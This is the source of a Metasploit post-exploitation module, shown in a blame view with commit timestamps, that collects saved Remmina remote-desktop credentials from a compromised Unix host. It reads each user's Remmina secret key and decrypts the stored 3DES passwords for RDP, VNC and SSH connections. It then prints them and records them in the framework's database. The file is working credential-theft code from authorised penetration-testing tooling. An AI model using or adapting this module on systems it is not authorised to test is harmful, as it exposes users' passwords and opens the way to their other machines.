2014-08-01 00:34:58 +00:00
|
|
|
# encoding: binary
|
2014-08-01 00:15:19 +00:00
|
|
|
##
|
2014-10-31 00:07:20 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-08-01 00:15:19 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Unix
|
|
|
|
|
|
|
|
def initialize(info = {})
|
2014-10-30 23:11:13 +00:00
|
|
|
super(update_info(
|
|
|
|
info,
|
|
|
|
'Name' => 'UNIX Gather Remmina Credentials',
|
2014-11-17 16:57:37 +00:00
|
|
|
'Description' => %q(
|
2014-11-17 18:23:22 +00:00
|
|
|
Post module to obtain credentials saved for RDP and VNC from Remmina's configuration files.
|
|
|
|
These are encrypted with 3DES using a 256-bit key generated by Remmina which is (by design)
|
|
|
|
stored in (relatively) plain text in a file that must be properly protected.
|
2014-11-17 16:57:37 +00:00
|
|
|
),
|
2014-10-30 23:11:13 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => ['Jon Hart <jon_hart[at]rapid7.com>'],
|
|
|
|
'Platform' => %w(bsd linux osx unix),
|
|
|
|
'SessionTypes' => %w(shell meterpreter)
|
|
|
|
))
|
2014-08-01 00:15:19 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2014-10-30 23:11:13 +00:00
|
|
|
creds = extract_all_creds
|
|
|
|
creds.uniq!
|
2014-10-31 00:07:20 +00:00
|
|
|
if creds.empty?
|
|
|
|
vprint_status('No Reminna credentials collected')
|
2014-08-01 00:15:19 +00:00
|
|
|
else
|
2014-10-30 23:11:13 +00:00
|
|
|
vprint_good("Collected #{creds.size} sets of Remmina credentials")
|
|
|
|
cred_table = Rex::Ui::Text::Table.new(
|
|
|
|
'Header' => 'Remmina Credentials',
|
|
|
|
'Indent' => 1,
|
|
|
|
'Columns' => %w(Host Port Service User Password)
|
|
|
|
)
|
|
|
|
|
|
|
|
creds.each do |cred|
|
|
|
|
cred_table << cred
|
2014-11-17 18:49:18 +00:00
|
|
|
report_credential(cred[3], cred[4])
|
2014-10-30 23:11:13 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
print_line(cred_table.to_s)
|
2014-08-01 00:15:19 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def decrypt(secret, data)
|
|
|
|
c = OpenSSL::Cipher::Cipher.new('des3')
|
|
|
|
key_data = Base64.decode64(secret)
|
2014-08-01 00:34:17 +00:00
|
|
|
# the key is the first 24 bytes of the secret
|
|
|
|
c.key = key_data[0, 24]
|
2014-08-01 00:15:19 +00:00
|
|
|
# the IV is the last 8 bytes of the secret
|
2014-08-01 00:34:17 +00:00
|
|
|
c.iv = key_data[24, 8]
|
2014-08-01 00:15:19 +00:00
|
|
|
# passwords less than 16 characters are padded with nulls
|
|
|
|
c.padding = 0
|
|
|
|
c.decrypt
|
|
|
|
p = c.update(Base64.decode64(data))
|
|
|
|
p << c.final
|
|
|
|
# trim null-padded, < 16 character passwords
|
|
|
|
p.gsub(/\x00*$/, '')
|
|
|
|
end
|
|
|
|
|
|
|
|
# Extracts all remmina creds found anywhere on the target
|
|
|
|
def extract_all_creds
|
2014-10-30 23:11:13 +00:00
|
|
|
creds = []
|
2014-08-01 00:15:19 +00:00
|
|
|
user_dirs = enum_user_directories
|
|
|
|
if user_dirs.empty?
|
|
|
|
print_error('No user directories found')
|
2014-10-31 00:07:20 +00:00
|
|
|
return
|
|
|
|
end
|
2014-08-01 00:15:19 +00:00
|
|
|
|
2014-10-31 00:07:20 +00:00
|
|
|
vprint_status("Searching for Remmina creds in #{user_dirs.size} user directories")
|
|
|
|
# walk through each user directory
|
|
|
|
enum_user_directories.each do |user_dir|
|
|
|
|
remmina_dir = ::File.join(user_dir, '.remmina')
|
|
|
|
pref_file = ::File.join(remmina_dir, 'remmina.pref')
|
|
|
|
next unless file?(pref_file)
|
2014-08-01 00:15:19 +00:00
|
|
|
|
2014-10-31 00:07:20 +00:00
|
|
|
remmina_prefs = get_settings(pref_file)
|
|
|
|
next if remmina_prefs.empty?
|
2014-08-01 00:15:19 +00:00
|
|
|
|
2014-10-31 00:07:20 +00:00
|
|
|
if (secret = remmina_prefs['secret'])
|
|
|
|
vprint_status("Extracted secret #{secret} from #{pref_file}")
|
|
|
|
else
|
|
|
|
print_error("No Remmina secret key found in #{pref_file}")
|
|
|
|
next
|
|
|
|
end
|
|
|
|
|
|
|
|
# look for any \d+\.remmina files which contain the creds
|
|
|
|
cred_files = dir(remmina_dir).map do |entry|
|
|
|
|
::File.join(remmina_dir, entry) if entry =~ /^\d+\.remmina$/
|
|
|
|
end
|
|
|
|
cred_files.compact!
|
|
|
|
|
|
|
|
if cred_files.empty?
|
|
|
|
vprint_status("No Remmina credential files in #{remmina_dir}")
|
|
|
|
else
|
|
|
|
creds |= extract_creds(secret, cred_files)
|
2014-08-01 00:15:19 +00:00
|
|
|
end
|
|
|
|
end
|
2014-10-31 00:07:20 +00:00
|
|
|
|
2014-10-30 23:11:13 +00:00
|
|
|
creds
|
2014-08-01 00:15:19 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def extract_creds(secret, files)
|
2014-10-30 23:11:13 +00:00
|
|
|
creds = []
|
2014-08-01 00:15:19 +00:00
|
|
|
files.each do |file|
|
|
|
|
settings = get_settings(file)
|
2014-10-31 00:07:20 +00:00
|
|
|
next if settings.empty?
|
2014-08-01 00:15:19 +00:00
|
|
|
|
|
|
|
# get protocol, host, user
|
|
|
|
proto = settings['protocol']
|
|
|
|
host = settings['server']
|
|
|
|
case proto
|
|
|
|
when 'RDP'
|
|
|
|
port = 3389
|
|
|
|
user = settings['username']
|
|
|
|
when 'VNC'
|
|
|
|
port = 5900
|
|
|
|
domain = settings['domain']
|
|
|
|
if domain.blank?
|
|
|
|
user = settings['username']
|
|
|
|
else
|
|
|
|
user = domain + '\\' + settings['username']
|
|
|
|
end
|
|
|
|
when 'SFTP', 'SSH'
|
2014-10-31 00:07:20 +00:00
|
|
|
# XXX: in my testing, the box to save SSH passwords was disabled
|
|
|
|
# so this may never work
|
2014-08-01 00:15:19 +00:00
|
|
|
user = settings['ssh_username']
|
|
|
|
port = 22
|
|
|
|
else
|
|
|
|
print_error("Unsupported protocol: #{proto}")
|
|
|
|
next
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the password
|
|
|
|
encrypted_password = settings['password']
|
2014-10-31 00:07:20 +00:00
|
|
|
password = nil
|
|
|
|
unless encrypted_password.blank?
|
2014-08-01 00:15:19 +00:00
|
|
|
password = decrypt(secret, encrypted_password)
|
|
|
|
end
|
|
|
|
|
2014-10-08 19:32:52 +00:00
|
|
|
if host && user && password
|
2014-10-30 23:11:13 +00:00
|
|
|
creds << [ host, port, proto.downcase, user, password ]
|
2014-08-01 00:15:19 +00:00
|
|
|
else
|
2014-10-08 19:48:49 +00:00
|
|
|
missing = []
|
|
|
|
missing << 'host' unless host
|
|
|
|
missing << 'user' unless user
|
|
|
|
missing << 'password' unless password
|
|
|
|
vprint_error("No #{missing.join(',')} in #{file}")
|
2014-08-01 00:15:19 +00:00
|
|
|
end
|
|
|
|
end
|
2014-10-31 00:07:20 +00:00
|
|
|
|
2014-10-30 23:11:13 +00:00
|
|
|
creds
|
2014-08-01 00:15:19 +00:00
|
|
|
end
|
|
|
|
|
2014-10-31 00:12:33 +00:00
|
|
|
# Reads key=value pairs from the specified file, returning them as a Hash of key => value
|
2014-08-01 00:15:19 +00:00
|
|
|
def get_settings(file)
|
|
|
|
settings = {}
|
|
|
|
read_file(file).split("\n").each do |line|
|
2014-10-31 00:12:33 +00:00
|
|
|
if /^\s*(?<setting>[^#][^=]+)=(?<value>.*)/ =~ line
|
|
|
|
settings[setting] = value
|
2014-08-01 00:15:19 +00:00
|
|
|
end
|
|
|
|
end
|
2014-10-31 00:07:20 +00:00
|
|
|
|
|
|
|
vprint_error("No settings found in #{file}") if settings.empty?
|
2014-08-01 00:15:19 +00:00
|
|
|
settings
|
|
|
|
end
|
2014-11-17 18:49:18 +00:00
|
|
|
|
|
|
|
def report_credential(user, pass)
|
|
|
|
credential_data = {
|
|
|
|
workspace_id: myworkspace_id,
|
|
|
|
origin_type: :session,
|
|
|
|
session_id: session_db_id,
|
|
|
|
post_reference_name: self.refname,
|
|
|
|
username: user,
|
|
|
|
private_data: pass,
|
|
|
|
private_type: :password
|
|
|
|
}
|
|
|
|
|
|
|
|
create_credential(credential_data)
|
|
|
|
end
|
|
|
|
|
2014-08-01 00:15:19 +00:00
|
|
|
end
|